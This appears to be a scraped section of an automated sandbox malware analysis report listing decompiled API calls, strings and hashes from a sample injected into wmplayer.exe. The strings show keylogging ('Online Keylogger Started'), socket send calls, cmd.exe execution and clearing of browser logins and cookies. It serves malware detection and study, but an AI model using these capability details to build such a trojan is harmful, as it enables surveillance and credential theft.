                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                            • _free.LIBCMT ref: 0044F7C7
                                                                                            • _free.LIBCMT ref: 0044F7D9
                                                                                            • _free.LIBCMT ref: 0044F7EB
                                                                                            • _free.LIBCMT ref: 0044F7FD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                            • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                                                            • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                            • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 100091D0
                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                            • _free.LIBCMT ref: 100091E2
                                                                                            • _free.LIBCMT ref: 100091F4
                                                                                            • _free.LIBCMT ref: 10009206
                                                                                            • _free.LIBCMT ref: 10009218
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                            • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                            • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                            • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 00443305
                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                            • _free.LIBCMT ref: 00443317
                                                                                            • _free.LIBCMT ref: 0044332A
                                                                                            • _free.LIBCMT ref: 0044333B
                                                                                            • _free.LIBCMT ref: 0044334C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                            • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                                                            • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                            • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 1000536F
                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                            • _free.LIBCMT ref: 10005381
                                                                                            • _free.LIBCMT ref: 10005394
                                                                                            • _free.LIBCMT ref: 100053A5
                                                                                            • _free.LIBCMT ref: 100053B6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                            • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                            • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                            • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                            APIs
                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                            • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                            • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                              • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                              • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                            • String ID: (FG
                                                                                            • API String ID: 3142014140-2273637114
                                                                                            • Opcode ID: 632929880f3897dc225356c3fd8fc529f83d4e6927153ab9b442b8a3d3f73b3f
                                                                                            • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                                                            • Opcode Fuzzy Hash: 632929880f3897dc225356c3fd8fc529f83d4e6927153ab9b442b8a3d3f73b3f
                                                                                            • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                                                            APIs
                                                                                            • _strpbrk.LIBCMT ref: 0044D4A8
                                                                                            • _free.LIBCMT ref: 0044D5C5
                                                                                              • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,00000000,0000000A,0000000A,00000000,0041AD67,00000022,?,?,0043A833,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
                                                                                              • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417,0000000A,00000000), ref: 0043A878
                                                                                              • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000), ref: 0043A87F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                            • String ID: *?$.
                                                                                            • API String ID: 2812119850-3972193922
                                                                                            • Opcode ID: 3ccd6c7c6263025d80bbf4df8e19646480fb990c35b4b1cfbff97afb24dbcef1
                                                                                            • Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
                                                                                            • Opcode Fuzzy Hash: 3ccd6c7c6263025d80bbf4df8e19646480fb990c35b4b1cfbff97afb24dbcef1
                                                                                            • Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54
                                                                                            APIs
                                                                                            • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                              • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                              • Part of subcall function 0040428C: connect.WS2_32(?,00D8BAC8,00000010), ref: 004042A5
                                                                                              • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                                                              • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                            • String ID: XCG$`AG$>G
                                                                                            • API String ID: 2334542088-2372832151
                                                                                            • Opcode ID: 8a8ecbd8101e95278cb0480dd491a454bc98c9d8db51b8974174652163066092
                                                                                            • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                                                            • Opcode Fuzzy Hash: 8a8ecbd8101e95278cb0480dd491a454bc98c9d8db51b8974174652163066092
                                                                                            • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                                                            APIs
                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\Windows Media Player\wmplayer.exe,00000104), ref: 00442714
                                                                                            • _free.LIBCMT ref: 004427DF
                                                                                            • _free.LIBCMT ref: 004427E9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$FileModuleName
                                                                                            • String ID: C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                            • API String ID: 2506810119-2246096414
                                                                                            • Opcode ID: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                                                            • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                                                            • Opcode Fuzzy Hash: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                                                            • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                                                            APIs
                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\Windows Media Player\wmplayer.exe,00000104), ref: 10004C1D
                                                                                            • _free.LIBCMT ref: 10004CE8
                                                                                            • _free.LIBCMT ref: 10004CF2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$FileModuleName
                                                                                            • String ID: C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                            • API String ID: 2506810119-2246096414
                                                                                            • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                            • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                            • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                            • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                            APIs
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                              • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                            • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                            • String ID: /sort "Visit Time" /stext "$8>G
                                                                                            • API String ID: 368326130-2663660666
                                                                                            • Opcode ID: a76726b47ade6a03491d848e6c0f6bffc38de7506ed2be7e87e14d0b5935c260
                                                                                            • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                                                            • Opcode Fuzzy Hash: a76726b47ade6a03491d848e6c0f6bffc38de7506ed2be7e87e14d0b5935c260
                                                                                            • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                                                            APIs
                                                                                            • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                            • wsprintfW.USER32 ref: 0040A905
                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: EventLocalTimewsprintf
                                                                                            • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                            • API String ID: 1497725170-1359877963
                                                                                            • Opcode ID: fcd139a15132826d048fc9099f5513e63a32d772a8cf7c4d95b98b470fd5f9fd
                                                                                            • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                                                            • Opcode Fuzzy Hash: fcd139a15132826d048fc9099f5513e63a32d772a8cf7c4d95b98b470fd5f9fd
                                                                                            • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                                                            APIs
                                                                                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                                                            • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateThread$LocalTime$wsprintf
                                                                                            • String ID: Online Keylogger Started
                                                                                            • API String ID: 112202259-1258561607
APIs
• CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
• GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
• __dosmaperr.LIBCMT ref: 0044AAFE
Strings
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Yara matches
Similarity
• API ID: CloseErrorHandleLast__dosmaperr
• String ID: `@
• API String ID: 2583163307-951712118
APIs
• WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
• CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
• SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
Strings
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Yara matches
Similarity
• API ID: CloseEventHandleObjectSingleWait
• String ID: Connection Timeout
• API String ID: 2055531096-499159329
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
  • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
  • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
Strings
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Yara matches
Similarity
• API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
• String ID: bad locale name
• API String ID: 3628047217-1405518554
APIs
• ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
Strings
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Yara matches
Similarity
• API ID: ExecuteShell
• String ID: /C $cmd.exe$open
• API String ID: 587946157-3896048727
APIs
• TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
• UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
• TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
Strings
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Yara matches
Similarity
• API ID: TerminateThread$HookUnhookWindows
• String ID: pth_unenc
• API String ID: 3123878439-4028850238
APIs
• GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
• GetProcAddress.KERNEL32(00000000), ref: 00401441
Strings
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetCursorInfo$User32.dll
• API String ID: 1646373207-2714051624
APIs
• LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
• GetProcAddress.KERNEL32(00000000), ref: 004014E6
Strings
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Yara matches
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetLastInputInfo$User32.dll
• API String ID: 2574300362-1519888992
APIs
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Yara matches
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Yara matches
Similarity
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
• __freea.LIBCMT ref: 100087D5
  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
Memory Dump Source
• Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID:
• API String ID: 2652629310-0
APIs
Strings
• Cleared browsers logins and cookies., xrefs: 0040B8EF
• [Cleared browsers logins and cookies.], xrefs: 0040B8DE
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
• API String ID: 3472027048-1236744412
                                                                                            APIs
                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                              • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                            • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseOpenQuerySleepValue
                                                                                            • String ID: @CG$exepath$BG
                                                                                            • API String ID: 4119054056-3221201242
